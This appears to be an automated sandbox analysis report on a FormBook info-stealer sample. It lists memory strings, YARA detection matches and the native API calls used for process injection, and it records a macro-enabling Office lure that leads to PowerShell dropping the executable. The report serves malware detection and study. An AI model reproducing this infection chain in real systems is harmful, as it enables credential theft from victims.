          Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comR
          Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comegu
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: oftmhayq.exe, 00000018.00000003.428462060.0000000005A6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/O
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: oftmhayq.exe, 00000018.00000003.429554152.0000000005A6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlj
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG6
          Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma77
          Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comldva
          Source: oftmhayq.exe, 00000018.00000003.419516812.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.419609379.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: oftmhayq.exe, 00000018.00000003.419447690.0000000005A6D000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comat
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: oftmhayq.exe, 00000018.00000003.424365835.0000000005A38000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: oftmhayq.exe, 00000018.00000003.424456304.0000000005A37000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnn-u
          Source: oftmhayq.exe, 00000018.00000003.423993163.0000000005A37000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnp
          Source: oftmhayq.exe, 00000019.00000003.431627701.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.431695720.00000000063CD000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/I7s
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Kurst7D
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S7
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: oftmhayq.exe, 00000019.00000003.434710127.00000000063F1000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comc
          Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.como
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deX
          Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deocS
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000014.00000002.438220332.000001D20BD39000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: oftmhayq.exe, 00000018.00000002.467569207.0000000000EBB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 12Screenshot OCR: Enable Content : lj, 5 6 7 " _ _ _="1 - 8 9 10 . . 11 " 12 Microsoft Excel X 13 14 ! Wa
          Powershell drops PE fileShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\oftmhayq.exeJump to dropped file
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419D60 NtCreateFile,29_2_00419D60
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419E10 NtReadFile,29_2_00419E10
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419E90 NtClose,29_2_00419E90
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419F40 NtAllocateVirtualMemory,29_2_00419F40
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419E8A NtClose,29_2_00419E8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319910 NtAdjustPrivilegesToken,LdrInitializeThunk,29_2_01319910
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013199A0 NtCreateSection,LdrInitializeThunk,29_2_013199A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319860 NtQuerySystemInformation,LdrInitializeThunk,29_2_01319860
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013195D0 NtClose,LdrInitializeThunk,29_2_013195D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319780 NtMapViewOfSection,LdrInitializeThunk,29_2_01319780
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319660 NtAllocateVirtualMemory,LdrInitializeThunk,29_2_01319660
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013196E0 NtFreeVirtualMemory,LdrInitializeThunk,29_2_013196E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319950 NtQueueApcThread,29_2_01319950
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013199D0 NtCreateProcessEx,29_2_013199D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319820 NtEnumerateKey,29_2_01319820
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131B040 NtSuspendThread,29_2_0131B040
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319840 NtDelayExecution,29_2_01319840
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013198A0 NtWriteVirtualMemory,29_2_013198A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013198F0 NtReadVirtualMemory,29_2_013198F0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319B00 NtSetValueKey,29_2_01319B00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131A3B0 NtGetContextThread,29_2_0131A3B0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A20 NtResumeThread,29_2_01319A20
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A10 NtQuerySection,29_2_01319A10
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A00 NtProtectVirtualMemory,29_2_01319A00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A50 NtCreateFile,29_2_01319A50
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319A80 NtOpenDirectoryObject,29_2_01319A80
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131AD30 NtSetContextThread,29_2_0131AD30
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319520 NtWaitForSingleObject,29_2_01319520
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319560 NtWriteFile,29_2_01319560
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319540 NtReadFile,29_2_01319540
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013195F0 NtQueryInformationFile,29_2_013195F0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319730 NtQueryVirtualMemory,29_2_01319730
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319710 NtQueryInformationToken,29_2_01319710
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131A710 NtOpenProcessToken,29_2_0131A710
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131A770 NtOpenThread,29_2_0131A770
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319770 NtSetInformationFile,29_2_01319770
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319760 NtOpenProcess,29_2_01319760
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013197A0 NtUnmapViewOfSection,29_2_013197A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319FE0 NtCreateMutant,29_2_01319FE0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319610 NtEnumerateValueKey,29_2_01319610
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319670 NtQueryInformationProcess,29_2_01319670
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01319650 NtQueryValueKey,29_2_01319650
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013196D0 NtCreateKey,29_2_013196D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419D60 NtCreateFile,30_2_00419D60
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419E10 NtReadFile,30_2_00419E10
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419E90 NtClose,30_2_00419E90
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419F40 NtAllocateVirtualMemory,30_2_00419F40
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419E8A NtClose,30_2_00419E8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369910 NtAdjustPrivilegesToken,LdrInitializeThunk,30_2_01369910
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013699A0 NtCreateSection,LdrInitializeThunk,30_2_013699A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369860 NtQuerySystemInformation,LdrInitializeThunk,30_2_01369860
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369840 NtDelayExecution,LdrInitializeThunk,30_2_01369840
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013698F0 NtReadVirtualMemory,LdrInitializeThunk,30_2_013698F0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A00 NtProtectVirtualMemory,LdrInitializeThunk,30_2_01369A00
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A50 NtCreateFile,LdrInitializeThunk,30_2_01369A50
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013695D0 NtClose,LdrInitializeThunk,30_2_013695D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369710 NtQueryInformationToken,LdrInitializeThunk,30_2_01369710
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369780 NtMapViewOfSection,LdrInitializeThunk,30_2_01369780
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369660 NtAllocateVirtualMemory,LdrInitializeThunk,30_2_01369660
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013696E0 NtFreeVirtualMemory,LdrInitializeThunk,30_2_013696E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369950 NtQueueApcThread,30_2_01369950
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013699D0 NtCreateProcessEx,30_2_013699D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369820 NtEnumerateKey,30_2_01369820
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136B040 NtSuspendThread,30_2_0136B040
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013698A0 NtWriteVirtualMemory,30_2_013698A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369B00 NtSetValueKey,30_2_01369B00
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136A3B0 NtGetContextThread,30_2_0136A3B0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A20 NtResumeThread,30_2_01369A20
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A10 NtQuerySection,30_2_01369A10
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369A80 NtOpenDirectoryObject,30_2_01369A80
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136AD30 NtSetContextThread,30_2_0136AD30
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369520 NtWaitForSingleObject,30_2_01369520
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369560 NtWriteFile,30_2_01369560
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369540 NtReadFile,30_2_01369540
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013695F0 NtQueryInformationFile,30_2_013695F0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369730 NtQueryVirtualMemory,30_2_01369730
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136A710 NtOpenProcessToken,30_2_0136A710
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0136A770 NtOpenThread,30_2_0136A770
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369770 NtSetInformationFile,30_2_01369770
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369760 NtOpenProcess,30_2_01369760
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013697A0 NtUnmapViewOfSection,30_2_013697A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369FE0 NtCreateMutant,30_2_01369FE0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369610 NtEnumerateValueKey,30_2_01369610
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369670 NtQueryInformationProcess,30_2_01369670
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01369650 NtQueryValueKey,30_2_01369650
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013696D0 NtCreateKey,30_2_013696D0
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_02A9C13424_2_02A9C134
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_02A9E56824_2_02A9E568
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_02A9E57824_2_02A9E578
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BBD4B824_2_05BBD4B8
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BBB36824_2_05BBB368
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BB129024_2_05BB1290
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BB9F9024_2_05BB9F90
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BBC9A024_2_05BBC9A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BB1AB824_2_05BB1AB8
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_05BB1AA924_2_05BB1AA9
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F5D3824_2_071F5D38
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F292024_2_071F2920
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F21B024_2_071F21B0
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F004024_2_071F0040
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_071F363024_2_071F3630
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730C5B824_2_0730C5B8
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730BCE824_2_0730BCE8
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730E05024_2_0730E050
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_07302F0524_2_07302F05
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_073017FA24_2_073017FA
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_07302A5524_2_07302A55
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730012824_2_07300128
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730014524_2_07300145
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730B9A024_2_0730B9A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_0188C13425_2_0188C134
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_0188E56825_2_0188E568
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_0188E57825_2_0188E578
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074BED1025_2_074BED10
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074B2B5825_2_074B2B58
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074B2B4925_2_074B2B49
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074B28F825_2_074B28F8
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_074B28A825_2_074B28A8
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07AD5D3825_2_07AD5D38
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07AD21B025_2_07AD21B0
